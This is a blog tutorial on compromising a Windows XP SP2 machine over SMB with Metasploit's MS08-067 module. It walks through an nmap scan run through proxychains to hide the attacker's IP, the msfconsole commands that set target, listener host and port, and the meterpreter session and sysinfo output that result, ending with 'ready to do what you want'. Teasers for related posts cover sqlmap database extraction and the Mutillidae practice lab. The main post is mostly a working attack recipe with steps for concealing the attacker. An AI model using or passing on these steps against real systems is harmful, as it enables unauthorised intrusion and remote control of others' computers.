Exploit Samba Windows XP 2 With Backtrack

By -
Bismillah...

Many ways to exploit Windows XP with Bactrack such as backdoring by planting the payload. But today i'm gonna show you how to exploit samba port with metasploit.

I use <<Bactrack|R3

1. Open your terminal and find the opened port with command "nmap -sV ip_target", it works if target in the same network or using ip public.                                                              For example : proxychain nmap -sV 192.168.254.128. Use proxy to hide our ip
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          WAR-FTPD 1.65 (Name Jgaa's Fan Club FTP Service)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds  => we use this port
MAC Address: 00:0C:29:F5:6A:C1 (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
2. Now type "msfconsole", now drink your coffee or rearrange your music palylist.
3.  Type "search smb" we are going to use "exploit/windows/smb/ms08_067_netapi " so type "use exploit/windows/smb/ms08_067_netapi"
4. To set the target address "set RHOST ip_target"
5. Set the listener "set LHOST your_ip" and set the port "set LPORT 4444"
6. Type "exploit" to rock and roll :D the succes step will show this  "meterpreter >"
7.  To proof that we have exploited the target type "sysinfo". My system show this 
meterpreter > sysinfo
Computer        : LATIF-D65DC6E1D
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 
8. Now you are ready to do what you want. :D
The video is coming soon

Comments

Post a Comment

Populer Post

Extract Database With Sqlmap

By -
Bismlillah... Hello, buddy! have ever think why Oracle Corp will monopolize and commercialize Mysql? While many people already depended on it in their development. You do not need to answer it, seriously. Coz now we aren't going to talk about that, but we're gonna talk about how to use Sqlmap to extract database. Assumption: You have apache2, mysql, phpmyadmin instaled on your system. I use DVWA for victim site, click here  for more information and download link. You have found the vulnerable from DVWA site. Click here for tutorial. I use Mantra and Burp Suite for IG(Information Gathering). Click here for tutorial!. Important to find the cookie. Open your teminal and go to sqlmap directory " cd /pentest/database/sqlmap/ " or use gnome menu. So let's rock, here's the step: First read the manual by typing " ./sqlmap -h ". If you are already knew about the usage, let's continue. Here's the syntax " ./sqlmap.py -u victim_u...
Read more

How To Install Mutillidae And Try A Little Test

By -
Image
Bismillah... So, bofore we start sharing about Mutillidae. Better for us to know it's definition. Open the spoiler to read it, but if you aren't patient enough, just pass it by :D Open: Mutillidae is a free, open source web application provided to allow security enthusiest to pen-test and hack a web application. Mutillidae can be installed on Linux, Windows XP, and Windows 7 using XAMMP making it easy for users who do not want to install or administrate their own webserver. It is already installed on Samurai WTF. Simply replace existing version with latest on Samurai. Mutillidae contains dozens of vulnerabilities and hints to help the user exploit them; providing an easy-to-use web hacking environment deliberately designed to be used as a hack-lab for security enthusiast, classroom labs, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, in corporate web sec training courses, and as an "assess the assessor" tar...
Read more